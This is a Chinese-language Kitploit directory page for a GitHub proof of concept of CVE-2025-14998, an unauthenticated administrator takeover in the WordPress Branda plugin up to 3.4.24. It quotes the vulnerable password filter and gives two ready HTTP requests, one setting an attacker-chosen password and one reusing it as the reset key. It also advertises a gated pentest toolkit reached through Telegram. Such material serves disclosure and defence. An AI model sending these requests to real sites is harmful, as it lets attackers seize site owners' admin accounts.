Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/ktn1990/cve-2025-14998
密码攻击漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证
GitHubktn1990/cve-2025-14998

CVE-2025-14998

CVE-2025-14998 WordPress 插件 - Branda – 白标与品牌化,免费登录页面定制器 <= 3.4.24 - 通过账户接管实现未认证权限提升

查看仓库
228个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Wordpress Branda – 白标与品牌定制、免费登录页面自定义器 <= 3.4.24 - 未认证账户接管导致的权限提升

CVE-2025-14998 WordPress 的 Branda 插件在包括 3.4.24 在内的所有版本中,均存在通过账户接管进行权限提升的漏洞。这是由于该插件在更新用户密码之前,未正确验证用户身份。这使得未认证攻击者能够更改任意用户(包括管理员)的密码,并借此获取其账户的访问权限。

如需了解更多 WordPress 漏洞和专属渗透测试工具,请通过 Telegram 联系我 @KtN1990。

🔍 根本原因分析

该插件通过挂钩 random_password 过滤器,覆盖了 WordPress 的密码生成逻辑。它并未让 WordPress 生成安全的随机密码,而是将其替换为用户可控的输入。

漏洞代码

root@kitploit:~
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;

    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }

    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];
    } elseif ( ! empty( $key ) ) {
        $signup = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
                $key
            )
        );

        if ( ! ( empty( $signup ) || $signup->active ) ) {
            $meta = maybe_unserialize( $signup->meta );

            if ( ! empty( $meta['password'] ) ) {
                if ( 'yes' === $signup_password_use_encryption ) {
                    $password = $this->password_decrypt( $meta['password'] );
                } else {
                    $password = $meta['password'];
                }
            }
        }
    }

    return $password;
}

🧪 概念验证(已脱敏)

步骤 1 — 使用任意密码触发密码重置

root@kitploit:~
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded

user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password

password_1 的值可以是任意攻击者可控的字符串。


步骤 2 — 使用相同的值作为重置密钥完成重置

root@kitploit:~
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local

✅ 结果

  • WordPress 接受攻击者控制的密码
  • 管理员密码被更改
  • 攻击者可以以受影响用户的身份进行身份验证

无需邮箱访问权限或有效的密码重置令牌。


💥 影响

未认证攻击者可以:

  • 重置任意 WordPress 用户的密码
  • 接管管理员账户
  • 获得 WordPress 安装的完全控制权
  • 修改插件、主题或内容

联系方式

  • @KtN1990

更多漏洞,查看 Megatron!

标志

  • 💣 什么是 Megatron?Megatron 是一款专为严肃测试人员和红队成员设计的高级渗透测试工具。无论是审计、扫描还是测试基础设施,Megatron 都能提供你所需的能力。

  • 🛡️ 适用对象: – 安全研究人员 – 渗透测试人员 – 道德黑客

  • 📦 持续维护,包含约 230 个旧版研究模块;近期对扫描器核心进行了改进,以提升稳定性和检测能力。

  • 🎯 目的:仅为经过授权的安全测试、教育、防御性研究和红队训练而提供。本版本不得用于非法用途。分发受限 — 需经过验证并签署《负责任使用协议》/ NDA 后方可获取访问权限。

  • 🛡 负责任访问政策(摘要):

  1. 仅向经过验证的安全专业人员、企业安全团队、认可实验室或培训机构提供访问权限。
  2. 你必须提供组织名称、职位、官方邮箱(企业邮箱)和合法用途。
  3. 只有在验证并签署我们的《负责任使用协议》/ NDA 后,才会授予完整下载权限。
  4. 对滥用行为零容忍 — 一旦发现恶意使用的证据,将撤销访问权限并在必要时进行举报。
  • 📩 联系 / 请求 / 验证:@KtN1990 — 请附上组织、职位和简要的访问理由。Telegram 频道

演示

图片替代文本

许可证

MIT

下载工具